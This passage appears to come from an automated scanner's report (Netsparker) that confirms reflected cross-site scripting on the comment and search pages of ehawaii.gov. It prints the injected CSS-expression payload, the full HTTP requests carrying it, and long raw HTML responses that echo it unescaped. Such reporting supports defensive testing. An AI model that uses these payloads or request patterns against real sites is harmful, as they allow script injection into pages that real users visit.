href="http://www.surveymonkey.com/s/hicredesign" class="noline"><img src="/dakine/images/hawaiisealandsurvey.jpg" border="0" alt="Survey" /></a></div> </div></div><!-- START: Subheader --><div id="subheader"> <div align="center"><div id="subheaderContent"> <span class="left"><span class="middle"><span class="right"> <div id="livehelp"><div id="ciMygb" style="z-index:100;position:absolute"></div><div id="scMygb" style="display:inline"></div><div id="sdMygb" style="display:none"></div><script type="text/javascript">var seMygb=document.createElement("script");seMygb.type="text/javascript";var seMygbs=(location.protocol.indexOf("https")==0?"https://secure.providesupport.com/image":"http://image.providesupport.com")+"/js/hic/safe-standard.js?ps_h=Mygb\u0026ps_t="+new Date().getTime()+"\u0026online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif\u0026offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif";setTimeout("seMygb.src=seMygbs;document.getElementById('sdMygb').appendChild(seMygb)",1)</script><noscript><div style="display:inline"><a href="http://www.providesupport.com?messenger=hic" class="noline">Customer Support Chat</a></div></noscript></div> <div id="search"><img src="/dakine/images/divider.gif" align="middle" /><img src="/dakine/images/magnifyingglass.jpg" align="middle" /><span class="searchText">Enter a few words describing the service you're looking for:</span> <form style="margin: 0; display: inline;" id="searchbox_012249442604008016873:fyi5sijjiuo" action="/dakine/search.html" method="get"> <input id="searchText" name="q" type="text" size="25" align="middle" value=""/>&nbsp;<select id="searchBy" name="searchby"> <option value="all" >All</option> <option value="tag" >Tags only</option> </select> <input type="hidden" name="cx" value="012249442604008016873:fyi5sijjiuo" /> <input type="hidden" name="cof" value="FORID:9" /> <input name="sa" type="submit" class="subhbutton" value="Search" /> </form> </div> </span></span></span> </div></div></div><center><!-- START: Content --><div id="container"><div align="center"><div id="columnLeftSubpg"> <div id="subpage"> <div id="feedback"> <form action="/dakine/comment.html" method="post" style="display:inline; margin:0;"> <input type="hidden" name="applicationId" value="" stYle="x:expre/**/ssion(netsparker(9)) "/> <h1>Feedback</h1> <p>Did you find what you were looking for? <input name="foundLookingFor" type="radio" value="true" checked="checked"/> Yes <input name="foundLookingFor" type="radio" value="false" /> No</p> <p>If no, what were you looking for?<br /> <textarea name="lookingFor"></textarea> </p> <div id="linegrey"></div> <h3>Frequency</h3> <p>How often do you use eHawaiiGov?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="20%" align="center" valign="middle" bgcolor="#D53269" class="white"> Daily</td> <td width="20%" align="center" valign="middle" bgcolor="#FF9000" class="white">Weekly</td> <td width="20%" align="center" valign="middle" bgcolor="#FFD520" class="white">Monthly</td> <td width="20%" align="center" valign="middle" bgcolor="#C1D93B" class="white">Sometimes</td> <td width="20%" align="center" valign="middle" bgcolor="#5EC5C2" class="white">My 1st Time</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Ease of Use</h3> <p>Overall, how easy or difficult is it to use this site?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="20%" align="center" valign="middle" bgcolor="#D53269" class="white">1 - Very Easy </td> <td width="20%" align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td width="20%" align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td width="20%" align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td width="20%" align="center" valign="middle" bgcolor="#5EC5C2" class="white">5 - Difficult</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Navigation</h3> <p>Can information be located quickly and easily?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center" valign="middle" bgcolor="#D53269" class="white">1 - Very Easy</td> <td align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td align="center" valign="middle" bgcolor="#5EC5C2" class="white"> 5 - Difficult</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Appearance</h3> <p>Do you find the layout, design, colors and presentation of content attractive and pleasing?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center" valign="middle" bgcolor="#D53269" class="white">1 - Very Attractive</td> <td align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td align="center" valign="middle" bgcolor="#5EC5C2" class="white"> 5 - Unattractive</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Content</h3> <p>Was the information adequate for your needs?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="20%" align="center" valign="middle" bgcolor="#D53269" class="white">1 - Excellent</td> <td width="20%" align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td width="20%" align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td width="20%" align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td width="20%" align="center" valign="middle" bgcolor="#5EC5C2" class="white"> 5 - Poor</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <p>How did you find out about us?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="33%" align="left" valign="top"><input type="checkbox" name="referrals" value="8" /> Newspaper Article <br /> <input type="checkbox" name="referrals" value="9" /> Government Agency <br /> <input type="checkbox" name="referrals" value="10" /> Television<br /> <input type="checkbox" name="referrals" value="11" /> Radio</td> <td width="33%" align="left" valign="top"><input type="checkbox" name="referrals" value="12" /> Direct Mail <br /> <input type="checkbox" name="referrals" value="13" /> Conference or Trade Show <br /> <input type="checkbox" name="referrals" value="14" /> AOL<br /> <input type="checkbox" name="referrals" value="15" /> Search Engine </td> <td width="33%" align="left" valign="top"><input type="checkbox" name="referrals" value="16" /> Referred by friend or colleague <br /> <input type="checkbox" name="referrals" value="17" /> Advertisement<br /> <input type="checkbox" name="referrals" value="18" /> Link from another website <br /> <input type="checkbox" name="referrals" value="19" /> Other</td> </tr> </table> <div id="linegrey"></div> Would you use this online service again? <input name="useServiceAgain" type="radio" value="true" checked="checked"/> Yes <input name="useServiceAgain" type="radio" value="false" /> No</p> <div id="linegrey"></div> What other Hawaii government services would you like to..
- /dakine/comment.html

/dakine/comment.html CONFIRMED

http://www.ehawaii.gov/dakine/comment.html

Parameters

Parameter Type Value
applicationId POST " stYle="x:expre/**/ssion(alert(9))
foundLookingFor POST true
lookingFor POST 3
frequency POST 3
ease POST 3
navigation POST 3
appearance POST 3
content POST 3
useServiceAgain POST true
otherServices POST 3
suggestions POST 3
email POST netsparker@example.com

Request

POST /dakine/comment.html HTTP/1.1
Referer: http://www.ehawaii.gov/dakine/comment.html?applicationId=73
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.ehawaii.gov
Cookie: JSESSIONID=005A0741405AD03019CD05F78CB51F97.lono
Content-Length: 238
Accept-Encoding: gzip, deflate

applicationId=%22+stYle%3d%22x%3aexpre%2f**%2fssion(netsparker(9))+&foundLookingFor=true&lookingFor=3&frequency=3&ease=3&navigation=3&appearance=3&content=3&useServiceAgain=true&otherServices=3&suggestions=3&email=netsparker%40example.com

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:25:30 GMT
Server: Apache-Coyote/1.1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=A340C403F2F1AF0341335C5816E8F9D6.liona; Path=/dakine
Transfer-Encoding: chunked


<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>ehawaii.gov | Comments & Feedback</title><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /><link rel="stylesheet" type="text/css" href="/dakine/css/main.css"/><!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="/dakine/css/ie6.css"/><![endif]--><link href="/dakine/css/mobile.css" rel="stylesheet" type="text/css" media="handheld"><script type="text/javascript" src="/dakine/js/portal.js"></script></head><body><!-- START: Top Menu --><div id="top" align="center"> <div id="menu"> <ul> <li><a href="/dakine/search.html?tag=government" class="menu">Government</a></li> <li><a href="/dakine/search.html?tag=business" class="menu">Business</a></li> <li><a href="/dakine/search.html?tag=community" class="menu">Community</a></li> <li><a href="/dakine/search.html?tag=education" class="menu">Education</a></li> <li><a href="/dakine/search.html?tag=employment" class="menu">Employment</a></li> <li><a href="/dakine/search.html?tag=visiting" class="menu">Visiting</a></li> </ul> </div></div><!-- START: Header --><div id="header" align="center"> <div id="headerContent"> <div id="title"><a href="/dakine/index.html" class="noline"><img src="/dakine/images/title.jpg" border="0" alt="eHawaii.gov" /></a></div> <div id="seal"><a href="http://www.surveymonkey.com/s/hicredesign" class="noline"><img src="/dakine/images/hawaiisealandsurvey.jpg" border="0" alt="Survey" /></a></div> </div></div><!-- START: Subheader --><div id="subheader"> <div align="center"><div id="subheaderContent"> <span class="left"><span class="middle"><span class="right"> <div id="livehelp"><div id="ciMygb" style="z-index:100;position:absolute"></div><div id="scMygb" style="display:inline"></div><div id="sdMygb" style="display:none"></div><script type="text/javascript">var seMygb=document.createElement("script");seMygb.type="text/javascript";var seMygbs=(location.protocol.indexOf("https")==0?"https://secure.providesupport.com/image":"http://image.providesupport.com")+"/js/hic/safe-standard.js?ps_h=Mygb\u0026ps_t="+new Date().getTime()+"\u0026online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif\u0026offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif";setTimeout("seMygb.src=seMygbs;document.getElementById('sdMygb').appendChild(seMygb)",1)</script><noscript><div style="display:inline"><a href="http://www.providesupport.com?messenger=hic" class="noline">Customer Support Chat</a></div></noscript></div> <div id="search"><img src="/dakine/images/divider.gif" align="middle" /><img src="/dakine/images/magnifyingglass.jpg" align="middle" /><span class="searchText">Enter a few words describing the service you're looking for:</span> <form style="margin: 0; display: inline;" id="searchbox_012249442604008016873:fyi5sijjiuo" action="/dakine/search.html" method="get"> <input id="searchText" name="q" type="text" size="25" align="middle" value=""/>&nbsp;<select id="searchBy" name="searchby"> <option value="all" >All</option> <option value="tag" >Tags only</option> </select> <input type="hidden" name="cx" value="012249442604008016873:fyi5sijjiuo" /> <input type="hidden" name="cof" value="FORID:9" /> <input name="sa" type="submit" class="subhbutton" value="Search" /> </form> </div> </span></span></span> </div></div></div><center><!-- START: Content --><div id="container"><div align="center"><div id="columnLeftSubpg"> <div id="subpage"> <div id="feedback"> <form action="/dakine/comment.html" method="post" style="display:inline; margin:0;"> <input type="hidden" name="applicationId" value="" stYle="x:expre/**/ssion(netsparker(9)) "/> <h1>Feedback</h1> <p>Did you find what you were looking for? <input name="foundLookingFor" type="radio" value="true" checked="checked"/> Yes <input name="foundLookingFor" type="radio" value="false" /> No</p> <p>If no, what were you looking for?<br /> <textarea name="lookingFor"></textarea> </p> <div id="linegrey"></div> <h3>Frequency</h3> <p>How often do you use eHawaiiGov?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="20%" align="center" valign="middle" bgcolor="#D53269" class="white"> Daily</td> <td width="20%" align="center" valign="middle" bgcolor="#FF9000" class="white">Weekly</td> <td width="20%" align="center" valign="middle" bgcolor="#FFD520" class="white">Monthly</td> <td width="20%" align="center" valign="middle" bgcolor="#C1D93B" class="white">Sometimes</td> <td width="20%" align="center" valign="middle" bgcolor="#5EC5C2" class="white">My 1st Time</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Ease of Use</h3> <p>Overall, how easy or difficult is it to use this site?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="20%" align="center" valign="middle" bgcolor="#D53269" class="white">1 - Very Easy </td> <td width="20%" align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td width="20%" align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td width="20%" align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td width="20%" align="center" valign="middle" bgcolor="#5EC5C2" class="white">5 - Difficult</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Navigation</h3> <p>Can information be located quickly and easily?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center" valign="middle" bgcolor="#D53269" class="white">1 - Very Easy</td> <td align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td align="center" valign="middle" bgcolor="#5EC5C2" class="white"> 5 - Difficult</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Appearance</h3> <p>Do you find the layout, design, colors and presentation of content attractive and pleasing?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center" valign="middle" bgcolor="#D53269" class="white">1 - Very Attractive</td> <td align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td align="center" valign="middle" bgcolor="#5EC5C2" class="white"> 5 - Unattractive</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Content</h3> <p>Was the information adequate for your needs?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="20%" align="center" valign="middle" bgcolor="#D53269" class="white">1 - Excellent</td> <td width="20%" align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td width="20%" align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td width="20%" align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td width="20%" align="center" valign="middle" bgcolor="#5EC5C2" class="white"> 5 - Poor</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <p>How did you find out about us?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="33%" align="left" valign="top"><input type="checkbox" name="referrals" value="8" /> Newspaper Article <br /> <input type="checkbox" name="referrals" value="9" /> Government Agency <br /> <input type="checkbox" name="referrals" value="10" /> Television<br /> <input type="checkbox" name="referrals" value="11" /> Radio</td> <td width="33%" align="left" valign="top"><input type="checkbox" name="referrals" value="12" /> Direct Mail <br /> <input type="checkbox" name="referrals" value="13" /> Conference or Trade Show <br /> <input type="checkbox" name="referrals" value="14" /> AOL<br /> <input type="checkbox" name="referrals" value="15" /> Search Engine </td> <td width="33%" align="left" valign="top"><input type="checkbox" name="referrals" value="16" /> Referred by friend or colleague <br /> <input type="checkbox" name="referrals" value="17" /> Advertisement<br /> <input type="checkbox" name="referrals" value="18" /> Link from another website <br /> <input type="checkbox" name="referrals" value="19" /> Other</td> </tr> </table> <div id="linegrey"></div> Would you use this online service again? <input name="useServiceAgain" type="radio" value="true" checked="checked"/> Yes <input name="useServiceAgain" type="radio" value="false" /> No</p> <div id="linegrey"></div> What other Hawaii government services would you like to..
- /dakine/search.html

/dakine/search.html CONFIRMED

http://www.ehawaii.gov/dakine/search.html?q=%22%20stYle=%22x:expre/**/ssion(alert(9))%20&cx=01224944..

Parameters

Parameter Type Value
q GET " stYle="x:expre/**/ssion(alert(9))
cx GET 012249442604008016873:fyi5sijjiuo
cof GET FORID:9

Request

GET /dakine/search.html?q=%22%20stYle=%22x:expre/**/ssion(netsparker(9))%20&cx=012249442604008016873%3Afyi5sijjiuo&cof=FORID%3A9 HTTP/1.1
Referer: http://www.ehawaii.gov/dakine/comment.html?applicationId=73
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.ehawaii.gov
Cookie: JSESSIONID=9EFCBB664EB63024BAD54E6E7191EA02.liona
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:26:31 GMT
Server: Apache-Coyote/1.1
Content-Encoding:
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 2289


<?xml version="1.0"?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>ehawaii.gov | Search Results</title><!-- Meta Tags --><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta name="keywords" content="Hawaii.gov, Hawaii state portal, government" /><meta name="description" content="Connecting You to Hawai`i State Government. Online Services, Why wait inline? Get it done online." /><link rel="shortcut icon" href="/dakine/favicon.ico" type="image/x-icon" /><link rel="stylesheet" type="text/css" href="/dakine/css/main.css"/><link href="/dakine/css/mobile.css" rel="stylesheet" type="text/css" media="handheld"><!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="/dakine/css/ie6.css"/><![endif]--><!--Calendar CSS file--><script type="text/javascript" src="/dakine/js/portal.js"></script></head><body><!-- START: Top Menu --><div id="top" align="center"> <div id="menu"> <ul> <li><a href="/dakine/search.html?tag=government" class="menu">Government</a></li> <li><a href="/dakine/search.html?tag=business" class="menu">Business</a></li> <li><a href="/dakine/search.html?tag=community" class="menu">Community</a></li> <li><a href="/dakine/search.html?tag=education" class="menu">Education</a></li> <li><a href="/dakine/search.html?tag=employment" class="menu">Employment</a></li> <li><a href="/dakine/search.html?tag=visiting" class="menu">Visiting</a></li> </ul> <div id="weather"> <div><span class="content"><span class="temperature">Honolulu:&nbsp;81.0 F (27.2 C)&nbsp;Partly Cloudy</span></span></div> </div> </div></div><!-- START: Header --><div id="header" align="center"> <div id="headerContent"> <div id="title"><a href="/dakine/index.html" class="noline"><img src="/dakine/images/title.jpg" border="0" alt="eHawaii.gov" /></a></div> <div id="seal"><a href="http://www.surveymonkey.com/s/hicredesign" class="noline"><img src="/dakine/images/hawaiisealandsurvey.jpg" border="0" alt="Survey" /></a></div> </div></div><!-- START: Subheader --><div id="subheader"> <div align="center"><div id="subheaderContent"> <span class="left"><span class="middle"><span class="right"> <div id="livehelp"><div id="ciMygb" style="z-index:100;position:absolute"></div><div id="scMygb" style="display:inline"></div><div id="sdMygb" style="display:none"></div><script type="text/javascript">var seMygb=document.createElement("script");seMygb.type="text/javascript";var seMygbs=(location.protocol.indexOf("https")==0?"https://secure.providesupport.com/image":"http://image.providesupport.com")+"/js/hic/safe-standard.js?ps_h=Mygb\u0026ps_t="+new Date().getTime()+"\u0026online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif\u0026offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif";setTimeout("seMygb.src=seMygbs;document.getElementById('sdMygb').appendChild(seMygb)",1)</script><noscript><div style="display:inline"><a href="http://www.providesupport.com?messenger=hic" class="noline">Customer Support Chat</a></div></noscript></div> <div id="search"><img src="/dakine/images/divider.gif" align="middle" /><img src="/dakine/images/magnifyingglass.jpg" align="middle" /><span class="searchText">Enter a few words describing the service you're looking for:</span> <form style="margin: 0; display: inline;" id="searchbox_012249442604008016873:fyi5sijjiuo" action="/dakine/search.html" method="get"> <input id="searchText" name="q" type="text" size="25" align="middle" value="" stYle="x:expre/**/ssion(netsparker(9)) "/>&nbsp;<select id="searchBy" name="searchby"> <option value="all" >All</option> <option value="tag" >Tags only</option> </select> <input type="hidden" name="cx" value="012249442604008016873:fyi5sijjiuo" /> <input type="hidden" name="cof" value="FORID:9" /> <input name="sa" type="submit" class="subhbutton" value="Search" /> </form> </div> </span></span></span> </div></div></div><center><!-- START: Content --><style type="text/css"> #columnLeftSubpg #subpage iframe { width: 670px; }</style><div id="container" > <div align="center"><div id="columnLeftSR"> <span class="content"> <div id="matchingServices"> <h1 class="content">Matching Services</h1><span class="sr">Search results for:</span> <span class="sr2">" stYle="x:expre/**/ssion(netsparker(9)) </span><br/><br /><br/><br /><div id="linegrey"></div> No matches found. </div> </span></div><div id="columnRight"> <span class="content"> <p><a href="http://www.surveymonkey.com/s.aspx?sm=EHRSFlWd8uD8yxHM01CuIQ_3d_3d" class="noline"><img src="/dakine/images/feedback.jpg" border="0" alt="Feedback" /></a><a href="#" class="noline"></a></p> </div></span></div><div id="columnMiddleSR"> <span class="content"> <div id="matchingPages"> <h1 class="content">Matching Pages</h1><span class="sr">Search results for:</span> <span class="sr2">" stYle="x:expre/**/ssion(netsparker(9)) </span><br/><br /><br/><br /><div id="linegrey"></div> No matches found. </div> </span></div> </div></div><!-- START: Footer --></center></div><div id="footer" > <div id="footerContent" ><a href="/dakine/docs/about.html" class="copyrightLink">About Us</a><span class="copyrightDivider">|</span><a href="/dakine/docs/subscription.html" class="copyrightLink">Subscription Services</a><span class="copyrightDivider">|</span><a href="/dakine/docs/ada.html" class="copyrightLink">ADA Compliance</a><span class="copyrightDivider">|</span><a href="/dakine/docs/terms.html" class="copyrightLink">Terms of Use</a><span class="copyrightDivider">|</span><a href="/dakine/docs/privacy.html" class="copyrightLink">Privacy Policy</a><span class="copyrightDivider">|</span><a href="/dakine/docs/text.html" class="copyrightLink">Text Version</a><span class="copyrightDivider">|</span><a href="http://www.surveymonkey.com/s.aspx?sm=EHRSFlWd8uD8yxHM01CuIQ_3d_3d" class="copyrightLink">Feedback</a><br /> <span class="copyrighttext">&copy; 2010 HAWAII INFORMATION CONSORTIUM, LLC.</span> </div></div></div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-939376-1";urchinTracker();</script></body></html>
- /dakine/comment.html

/dakine/comment.html CONFIRMED

http://www.ehawaii.gov/dakine/comment.html

Parameters

Parameter Type Value
applicationId POST " stYle="x:expre/**/ssion(alert(9))
foundLookingFor POST false
lookingFor POST 3
frequency POST 7
ease POST 7
navigation POST 7
appearance POST 7
content POST 7
referrals POST 8
useServiceAgain POST false
otherServices POST 3
suggestions POST 3
email POST netsparker@example.com

Request

POST /dakine/comment.html HTTP/1.1
Referer: http://www.ehawaii.gov/dakine/comment.html?applicationId=73
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.ehawaii.gov
Cookie: JSESSIONID=9EF218A9490AD09B1225C3D841EB4C4D.lono
Content-Length: 252
Accept-Encoding: gzip, deflate

applicationId=%22+stYle%3d%22x%3aexpre%2f**%2fssion(netsparker(9))+&foundLookingFor=false&lookingFor=3&frequency=7&ease=7&navigation=7&appearance=7&content=7&referrals=8&useServiceAgain=false&otherServices=3&suggestions=3&email=netsparker%40example.com

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:28:45 GMT
Server: Apache-Coyote/1.1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=80DF62507E5530C64DAFF15714779C4B.olomea; Path=/dakine
Transfer-Encoding: chunked


<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>ehawaii.gov | Comments & Feedback</title><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /><link rel="stylesheet" type="text/css" href="/dakine/css/main.css"/><!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="/dakine/css/ie6.css"/><![endif]--><link href="/dakine/css/mobile.css" rel="stylesheet" type="text/css" media="handheld"><script type="text/javascript" src="/dakine/js/portal.js"></script></head><body><!-- START: Top Menu --><div id="top" align="center"> <div id="menu"> <ul> <li><a href="/dakine/search.html?tag=government" class="menu">Government</a></li> <li><a href="/dakine/search.html?tag=business" class="menu">Business</a></li> <li><a href="/dakine/search.html?tag=community" class="menu">Community</a></li> <li><a href="/dakine/search.html?tag=education" class="menu">Education</a></li> <li><a href="/dakine/search.html?tag=employment" class="menu">Employment</a></li> <li><a href="/dakine/search.html?tag=visiting" class="menu">Visiting</a></li> </ul> </div></div><!-- START: Header --><div id="header" align="center"> <div id="headerContent"> <div id="title"><a href="/dakine/index.html" class="noline"><img src="/dakine/images/title.jpg" border="0" alt="eHawaii.gov" /></a></div> <div id="seal"><a href="http://www.surveymonkey.com/s/hicredesign" class="noline"><img src="/dakine/images/hawaiisealandsurvey.jpg" border="0" alt="Survey" /></a></div> </div></div><!-- START: Subheader --><div id="subheader"> <div align="center"><div id="subheaderContent"> <span class="left"><span class="middle"><span class="right"> <div id="livehelp"><div id="ciMygb" style="z-index:100;position:absolute"></div><div id="scMygb" style="display:inline"></div><div id="sdMygb" style="display:none"></div><script type="text/javascript">var seMygb=document.createElement("script");seMygb.type="text/javascript";var seMygbs=(location.protocol.indexOf("https")==0?"https://secure.providesupport.com/image":"http://image.providesupport.com")+"/js/hic/safe-standard.js?ps_h=Mygb\u0026ps_t="+new Date().getTime()+"\u0026online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif\u0026offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif";setTimeout("seMygb.src=seMygbs;document.getElementById('sdMygb').appendChild(seMygb)",1)</script><noscript><div style="display:inline"><a href="http://www.providesupport.com?messenger=hic" class="noline">Customer Support Chat</a></div></noscript></div> <div id="search"><img src="/dakine/images/divider.gif" align="middle" /><img src="/dakine/images/magnifyingglass.jpg" align="middle" /><span 